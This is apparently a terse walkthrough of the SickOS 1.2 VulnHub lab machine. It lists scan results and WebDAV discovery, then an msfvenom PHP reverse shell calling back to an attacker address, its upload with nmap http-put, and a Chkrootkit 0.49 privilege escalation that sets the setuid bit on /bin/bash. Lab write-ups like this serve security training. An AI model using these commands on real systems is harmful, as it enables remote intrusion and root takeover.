source: https://www.vulnhub.com/entry/sickos-12,144/
192.168.1.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
maybe ubuntu 11.10/12.04
/index.php
/test/
/~sys~
curl -v -o /dev/null -s -XOPTIONS http://192.168.1.5/test/
MS-Author-Via: DAV
reverse shell:
msfvenom -p php/reverse_php LHOST=192.168.1.90 LPORT=443 -f raw > rs.php
nmap -p 80 192.168.1.5 --script http-put --script-args http-put.url=’/test/rs.php’,http-put.file=’./rs.php’
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
https://www.exploit-db.com/exploits/33899
Chkrootkit 0.49 - Local Privilege Escalation
echo “chmod +s /bin/bash” > /tmp/update
No comments:
Post a Comment